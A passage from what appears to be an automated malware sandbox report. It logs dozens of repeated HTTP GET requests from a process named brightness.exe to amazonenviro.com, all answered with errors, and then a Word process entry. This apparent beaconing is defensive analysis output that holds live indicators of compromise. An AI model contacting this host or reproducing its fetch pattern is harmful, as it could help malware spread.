Jan 10, 2025 09:00:47.850775957 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:47 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50173	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:48.006787062 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:48.919415951 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:48 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50175	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:49.054909945 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:49.968141079 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:49 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50177	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:50.099673033 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:51.007128954 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:50 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50179	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:51.196167946 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:52.118796110 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:51 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50181	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:52.259918928 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:53.182415962 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:53 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50183	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:53.310172081 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:54.243438959 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:54 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50185	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:54.372854948 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:55.295144081 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:55 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50187	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:55.477962017 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:56.418008089 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:56 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50189	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:56.545388937 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:57.476118088 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:57 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50191	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:57.605137110 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:58.553601027 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:58 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50193	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:58.680043936 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:59.657731056 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:59 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50195	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:59.785111904 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:00.713434935 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:00 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50197	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:00.839787960 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:01.769407988 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:01 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50199	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:01.899786949 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:02.843728065 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:02 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50201	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:02.970911026 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:03.896851063 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:03 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50203	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:04.022536993 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:04.939035892 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:04 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50205	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:05.065542936 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:06.028060913 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:05 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50207	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:06.155574083 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:07.124660969 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:06 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50209	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:07.255984068 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:08.205307961 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:08 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50211	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:08.332134962 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:09.279850006 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:09 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50213	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:09.409817934 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:10.443205118 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:10 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50215	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:10.574687958 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:11.519539118 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:11 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50217	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:11.655401945 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:12.572865009 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:12 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50219	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:12.709110975 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:13.637475967 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:13 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50221	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:13.803654909 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:14.739552975 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:14 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50223	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:14.873559952 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:15.790632963 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:15 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	50225	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:15.923348904 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:16.849894047 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:16 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50227	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:16.980406046 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:17.908380032 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:17 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50229	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:18.035800934 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:19.000243902 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:18 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50231	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:19.135947943 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:20.073010921 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:19 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50233	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:20.209860086 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:21.121885061 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:20 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50235	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:21.260569096 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:22.210985899 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:22 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50237	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:22.350897074 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:23.327714920 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:23 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50239	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:23.462342978 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:24.370398998 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:24 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50241	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:24.509913921 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:25.441354036 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:25 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50243	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:25.577210903 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:26.474482059 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:26 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50245	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:26.651557922 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:27.587016106 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:27 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50247	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:01:27.728924036 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:01:28.651297092 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:01:28 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	02:58:41
Start date:	10/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x2c0000
File size:	1'620'872 bytes
MD5 hash:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
